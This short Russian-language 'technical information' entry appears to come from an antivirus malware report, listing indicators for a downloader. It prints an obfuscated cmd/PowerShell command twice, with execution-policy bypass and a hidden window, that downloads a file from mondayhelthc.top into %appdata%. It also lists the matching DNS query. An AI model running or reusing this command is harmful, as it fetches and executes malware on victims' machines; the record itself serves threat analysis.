Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWe^rSh^El^L.E^Xe^ -^eXe^C^U^tiON^PoliCY bypASs ^-NOProfIl^E ^-^wiNdo^w^S^ty^LE HI^D^dEn ^(^NEw^-^OBJECt SYs^tEm.NeT^.WEb^C^LIe^nT).^D^Own^lO^AdfILE('http://mondayhelthc.top/r...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pOWe^rSh^El^L.E^Xe^ -^eXe^C^U^tiON^PoliCY bypASs ^-NOProfIl^E ^-^wiNdo^w^S^ty^LE HI^D^dEn ^(^NEw^-^OBJECt SYs^tEm.NeT^.WEb^C^LIe^nT).^D^Own^lO^AdfILE('http://mondayhelthc.top/r...' (со скрытым окном)